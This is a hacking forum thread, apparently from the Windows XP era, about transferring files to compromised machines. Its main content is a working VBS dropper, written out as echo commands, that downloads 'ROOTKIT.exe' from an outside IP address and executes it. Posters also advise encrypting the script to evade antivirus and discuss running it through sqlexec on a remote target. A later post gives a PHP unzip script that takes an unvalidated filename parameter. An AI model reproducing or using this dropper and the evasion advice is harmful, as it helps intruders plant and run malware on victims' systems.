hi,
i need your little help.
i heard something about upload by using vbs script.

so i found this nice stuff

try this way...

search this board there is a very big topic with 3 methods how to transfer using vbs. I've got it but not gonna post something which isn't mine

I believe the 'ADODB.Stream' thing was kill by Microsoft in their lastest winblows update.

i just updated my winxp, installed the adodb.stream thign, restarted, adn tried a vbs download script that used the adodb.stream and it worked fine, downloaded the file like normal

dont work when echoed in a shell

working fine with me also
check your clopy paste

ECHO Set xPost = CreateObject("Microsoft.XMLHTTP") >backup.vbs
ECHO xPost.Open "GET","http://81.X.X.X/ROOTKIT.exe",0 >>backup.vbs
ECHO xPost.Send() >>backup.vbs
ECHO Set sGet = CreateObject("ADODB.Stream") >>backup.vbs
ECHO sGet.Mode = 3 >>backup.vbs
ECHO sGet.Type = 1 >>backup.vbs
ECHO sGet.Open() >>backup.vbs
ECHO sGet.Write(xPost.responseBody) >>backup.vbs
ECHO sGet.SaveToFile "ROOTKIT.exe",2 >>backup.vbs
ECHO Dim Partizaan >>backup.vbs
ECHO Set Partizaan = CreateObject("WScript.Shell") >>backup.vbs
ECHO Partizaan.Run "ROOTKIT.exe" >>backup.vbs
cscript backup.vbs

I have been toying with it to.
This one works te best.

works great for me too

this is the Dropper-Script

it is detected by the most AV´s

if you wanna use it, write your own converter, to crypt the script

then it worx perfect

I can't execute it remotely via sqlexec when using "-signs.
If I use instead the '-sign it returns me a compilation-error.

Escaping with \ doesn't work too, anybody an idea???

Thank you all!

even if you re able to get the code on that box via sqlexec, it won't help help you uploading your files ... Microsoft patched this hole with a security update weeks ago!

Hard to find any machine with this patch missing!

Nice gonna check it out.. damn anoing when ftp are missing

Thank you very much for the double-quote tip, i'll check it out!

thanx gonna try this out for myself

sorry to hack this thread but as i am a new member, i cant start a topic,
i am not one of the elite hackers but still i keep tweaking with the net and there is something i want to share.

i have a free web space at tripod.co.uk, but they allow only 5 files at a time to upload, this was very hectic as i wanted to upload a free blog script to my domain.

then i found this free zip utilities for php PCL ZIP

i uploaded two files pclzip.lib.php and unzip.php. code for unzip.php is below
<?php
$filename = $_GET['filename'];
require_once("pclzip.lib.php");
$archive = new PclZip($filename);
if ($archive->extract() == 0) {
die("Error : ".$archive->errorInfo(true));
}
?>

so now u only have to upload one zip file, and then call unzip.php with a url like

http://domain/unzip.php?filename=<yourzippedfilename>

i know i am a newbie for this kinda stuff, ignore this if u don't find it useful.

regards
nuke

heres a paper i started thats not finished
it gives a few examples on how to transfer files from a shell prompt

you missed one in that tut

dont see rcp transfer anywhere also handy when ftp or tftp are renamed or deleted

nice txt though !

Thank you very much for lots of informations in this topic!
VBS Works perfect!

Regards
LiquidH20

Hmmm...i dont really know, where i have to inside my ftp-server with my servudaemon.exe + ini...

ECHO xPost.Open "GET","http://81.X.X.X/ROOTKIT.exe",0 >>backup.vbs

there is a "Get" "HTTP"

can i change it in FTP?

thx

8b@ll

well oyu can always submit a short tutorial on rcp transfer and ill add it to the textfile